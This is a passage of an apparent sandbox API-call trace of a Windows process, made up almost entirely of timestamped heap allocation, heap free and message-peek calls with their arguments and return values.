dwFlags=0x0, lpMem=0x14bd6a0 | out: hHeap=0x12c0000) returned 1 [0129.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff1b8 | out: hHeap=0x12c0000) returned 1 [0129.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0129.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff3c0 | out: hHeap=0x12c0000) returned 1 [0129.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4c0 | out: hHeap=0x12c0000) returned 1 [0129.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0129.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0129.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef890 | out: hHeap=0x12c0000) returned 1 [0129.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee98 | out: hHeap=0x12c0000) returned 1 [0129.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0129.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0129.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0129.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0129.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0129.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0129.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fedd0 | out: hHeap=0x12c0000) returned 1 [0129.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0129.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd160 | out: hHeap=0x12c0000) returned 1 [0129.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0129.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0129.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0129.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1c0 | out: hHeap=0x12c0000) returned 1 [0129.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0129.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0129.600] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0129.600] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0129.600] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20a) returned 0x1302b30 [0129.601] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0129.601] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0129.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1302b30 | out: hHeap=0x12c0000) returned 1 [0129.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0129.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0129.601] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee98 [0129.601] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0129.601] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef720 [0129.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0129.601] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ac8 [0129.601] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd160 [0129.601] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1c0 [0129.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0129.601] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0129.601] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0129.601] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0129.601] CharUpperBuffW (in: lpsz="MWMQWLZFSVGLEKEBWPKTQCNGY", cchLength=0x19 | out: lpsz="MWMQWLZFSVGLEKEBWPKTQCNGY") returned 0x19 [0129.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0129.602] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0129.602] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0129.602] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1) returned 0x12ef770 [0129.602] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0129.602] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0129.602] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0129.602] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0129.602] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0129.602] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1) returned 0x12ef810 [0129.602] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0129.602] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0129.602] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0129.602] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0129.602] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1) returned 0x12ef6f0 [0129.602] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0129.602] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0129.602] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0129.602] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1c200) returned 0x154cd98 [0129.609] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0129.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1) returned 0x12ef7b0 [0129.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0129.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0129.609] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0129.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2b0 [0129.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0129.610] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0129.610] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0129.610] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0129.610] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0129.610] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0129.610] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6a0 [0129.610] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0129.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6a0 | out: hHeap=0x12c0000) returned 1 [0129.610] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0129.610] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd598 [0129.610] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd520 [0129.610] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0129.610] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd628 [0129.610] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0129.610] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5b0 [0129.610] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0129.610] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1c200) returned 0x1568fa0 [0129.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fedd0 [0129.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd430 [0129.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0129.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd640 [0129.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0129.614] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff2a8 [0129.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4c0 [0129.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7f0 [0129.615] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4c0 | out: hHeap=0x12c0000) returned 1 [0129.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff000 [0129.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5c8 [0129.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6b8 [0129.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0129.615] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6b8 | out: hHeap=0x12c0000) returned 1 [0129.615] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0129.615] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff280 [0129.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd448 [0129.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef890 [0129.615] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd448 | out: hHeap=0x12c0000) returned 1 [0129.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff028 [0129.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd448 [0129.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd460 [0129.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0129.615] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0129.615] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0129.615] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.616] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff050 [0129.616] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5f8 [0129.616] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0129.616] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6a0 [0129.616] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0129.616] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0129.616] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0129.616] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0129.616] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0129.616] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.616] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0129.616] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0129.616] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0129.616] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0129.616] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0129.616] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0129.616] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0129.617] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.617] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0129.617] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.617] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0129.617] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0129.617] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0129.617] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0129.617] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0129.617] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0129.617] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0129.617] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.618] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0129.618] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.618] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0129.618] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0129.618] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0129.618] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0129.618] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0129.618] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0129.618] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e000 [0129.618] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.618] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e000 | out: hHeap=0x12c0000) returned 1 [0129.618] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.618] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0129.618] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0129.618] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0129.618] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0129.618] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0129.618] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0129.618] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0129.618] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0129.619] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.619] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0129.619] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0129.619] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0129.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0129.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0129.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0129.619] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0129.619] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0129.619] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.619] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0129.619] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0129.619] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0129.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0129.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0129.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0129.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0129.620] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0129.620] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0129.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0129.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0129.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0129.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0129.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0129.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0129.620] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0129.620] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0129.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0129.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0129.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0129.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0129.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0129.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e580 [0129.620] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e580 | out: hHeap=0x12c0000) returned 1 [0129.621] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.621] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0129.621] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0129.621] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0129.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0129.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0129.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0129.621] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e000 [0129.621] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e000 | out: hHeap=0x12c0000) returned 1 [0129.621] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.621] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0129.621] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0129.621] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0129.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0129.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0129.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0129.621] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e580 [0129.621] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e580 | out: hHeap=0x12c0000) returned 1 [0129.621] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.621] RtlAllocateHeap 